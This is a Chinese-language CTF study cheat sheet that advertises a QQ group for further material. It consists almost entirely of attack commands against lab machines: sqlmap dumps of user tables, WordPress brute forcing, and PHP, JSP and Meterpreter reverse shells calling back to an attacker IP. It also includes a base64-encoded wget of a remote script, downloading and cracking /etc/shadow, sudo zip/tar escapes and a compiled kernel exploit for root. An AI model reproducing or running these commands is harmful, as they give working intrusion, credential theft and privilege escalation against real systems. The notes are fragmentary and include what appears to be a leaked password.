这个是ctf学习资料,如果需要视频及靶场等学习资料可加QQ群1031811955
单用户模式下 按shif后e 把 ro recovery nomodeset,将之替换为rw single init=/bin/bash 按ctr+x passwd root
扫描局域网ip、mac映射关系
netdiscover -r 192.168.1.1/24
解除端口占用
netstat -pantu
netstat -lnp|grep 4444
fuser -v -n tcp 4444
kill -9 2169
ps -a
service network restart
/etc/init.d/network restart 或者是 /etc/init.d/networking restart
service vsftpd start
/home/uftp
nc -nlvp 4444
信息探测
nmap -sV 192.168.1.3
nmap -T4 -p- 192.168.1.6
nmap -T4 -A -v 192.168.1.6
nikto -host http://192.168.1.6
dirb http://192.168.1.6
python -c “import pty;pty.spawn(’/bin/bash’)”
ssh [email protected]
mysql -h 192.168.1.11 -u username_here -p
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.1.8
set username hadi
set threads 5
set pass_file /root/桌面/common-password/hadi.txt
set verbose true
python -c “import pty;pty.spawn(’/bin/bash’)”
sqlmap -u “http://192.168.1.8/cat.php?id=4-2” -D “photoblog” --tables
sqlmap -u “http://192.168.1.8/cat.php?id=4-2” -D “photoblog” -T “users” --columns
sqlmap -u “http://192.168.1.8/cat.php?id=4-2” -D “photoblog” -T “users” -C “login,password” --dump
http://192.168.1.9:8080/wordpress/wp-content/themes/twentythirteen/404.php
netdiscover -r 192.168.1.1/24
clear
playsms/index.php?app=main&inc=feature_sendfromfile&op=list
<?php system('uname -a');die(); ?>.phphttps://www.expolit-db.com/exipolits/42003
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -f elf > /var/www/html/shell
d2dldCBodHRwOi8vMTkyLjE2OC4xLjEwL3MgLU8gL3RtcC9hCg==
sudo perl -e "exec ’ /bin/sh’ "
bash -i
shellcd.PHP
apt-get install avws
sqlmap -u “http://192.168.1.9” --headers=“X-Forwarded-For:*” --dbs --batch
sqlmap -u url --headers=“X-Forwarded-For:*” --dbs --batch
sqlmap -u http://192.168.1.9 --headers=“X-Forwarded-For:*” -D photoblog --tables --batch
sqlmap -u http://192.168.1.9 --headers=“X-Forwarded-For:*” -D photoblog -T users --columns --batch
sqlmap -u http://192.168.1.9 --headers=“X-Forwarded-For:*” -D photoblog -T users -C login,password --dump --batch
cd /usr/share/webshells/php
cp php-reverse-shell.php /root/桌面/
msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -f raw > /root/桌面/shell.py
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
service apache2 start
service apache2 status
sysinfo
shell
http://192.168.1.11/wordpress/wp-content/themes/twentyfifteen/404.php
cat /etc/passwd
su togie
sudo -l
13.CTF夺旗-目录遍历(拿到www-data用户权限)
http://192.168.1.8/dbadmin/
http://192.168.1.8/dbadmin/test_db.php
owasp -zap
http://192.168.1.8/view.php?page=…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2Fetc%2Fpasswd
cd /usr/share/webshells/php
cp php-reverse-shell.php /root/桌面
mv php-reverse-shell.php shell.php
python -m “SimpleHTTPServer”
nc -nlvp 4444
/usr/databases/shell.php
http://192.168.1.8/view.php?page=…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2Fusr/databases/shell.php
python -c “import pty;pty.spawn(’/bin/bash’)”
14.WEB安全暴力破解
http://192.168.1.12/secret/wp-login.php
gedit /etc/hosts
http://vtcsec/secret/wp-login.php
wpscan --url 192.168.1.12/secret --enumerate u
wpscan --url http://192.168.1.12/secret --enumerate u
msfconsole
use auxiliary/scanner/http/wordpress_login_enum
set rhosts 192.168.1.12
set pass_file /usr/share/wordlists/dirb/common.txt
set username admin
set targeturi /secret/
run
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -f raw
back
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.10
http://192.168.1.12/secret/wp-content/themes/twentyseventeen/404.php
download /etc/passwd
download /etc/shadow
unshadow passwd shadow > cracked
john cracked
marlinspike
python -c “import pty;pty.spawn(’/bin/bash’)”
su - marlinspike
sudo -l
sudo bash
15.路径遍历(提权root权限)web安全提权
uname -a
cat /etc/issue
cat /etc/*-release
cat /etc/passwd
cat /etc/shadow
cat /etc/crontab
sudo
sudo -l
cd /home
cd wordpress
ssh [email protected]
sWfCsfJSPV9H3AmQzw8
touch exploit
sudo -u root zip exploit.zip exploit -T --unzip-comman=“sh -c /bin/bash”
sudo -u root tar cf /dev/null exploit --checkpoint=1 --checkpoint-action="/bin/bash"
16.web安全命令执行
http://192.168.1.12:8080/
http://192.168.1.12:8080/test.jsp
ls -l /tmp
ls -alh /tmp
ls -alh /home
ls -alh /home/bill
uname -a
ssh bill@localhost sudo -l
ssh bill@localhost sudo ufw disable
nc -lvp 444
ssh bill@localhost sudo bash -i>& /dev/tcp/192.168.1.10/444 0>& 1
cd /usr/share/webshells/jsp
cp jsp-reverse.jsp /root/桌面/
cd /root/桌面/
python -m SimpleHTTPServer
mv jsp-reverse.jsp webshell.jsp
ssh bill@localhost sudo wget “http://192.168.1.10:8000/webshell.jsp” -O /var/lib/tomcat8/webapps/ROOT/webshell.jsp
ssh bill@localhost sudo chmod 777 /var/lib/tomcat8/webapps/ROOT/webshell.jsp
17.命令执行(使用集成工具测试)
service network start
ifconfig ens33 192.168.1.11
安装sparta
git clone https://github.com/secforce/sparta.git /opt/sparta
git clone https://github.com/elixir-lang/elixir.git
apt-get install python-elixir
apt-get install ldap-utils rwho rsh-client x11-apps finger
cd /opt/sparta
./sparta.py
/usr/share/dirbuster/wordlists/directory-list-1.0.txt
http://192.168.1.11/admin/
http://192.168.1.11/dev
cd /opt/
git clone https://github.com/UltimateHackers/Hash-Buster/
cd Hash-Buster
hash-identifier
python hash.py
nc -nlvp 4444
echo ‘bash -i >& /dev/tcp/192.168.1.10/4445 0>&1’ | bash
sudo su
18.PUT上传漏洞
curl -v -X OPTIONS http://192.168.1.11/test
火狐安装RESTClient
cp /usr/share/webshells/php/php-reverse-shell.php shell.php
http://192.168.1.3/login.php
@btrisk.com
23.综合测试(高难度内核提权)WEB安全中级入侵
wpscan --url http://192.168.1.6/wordpress --enumerate at --enumerate ap --enumerate u
wpscan --url http://192.168.1.6/wordpress --enumerate u
msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.1.6 lport=4444 -f raw
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
http://192.168.1.6/wordpress/
http://192.168.1.6/wordpress/wp-admin/
http://192.168.1.6/wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentyfourteen&scrollto=0&updated=true
http://192.168.1.6/wordpress/wp-content/themes/twentyfourteen/404.php
searchsploit ubuntu 4.4.0
cd /usr/share/exploitdb/exploits/linux/local/
cp 41458.c /root/桌面
gcc 41458.c -o shellroot
upload /root/桌面/shellroot
chmod 777 shellroot
./shellroot
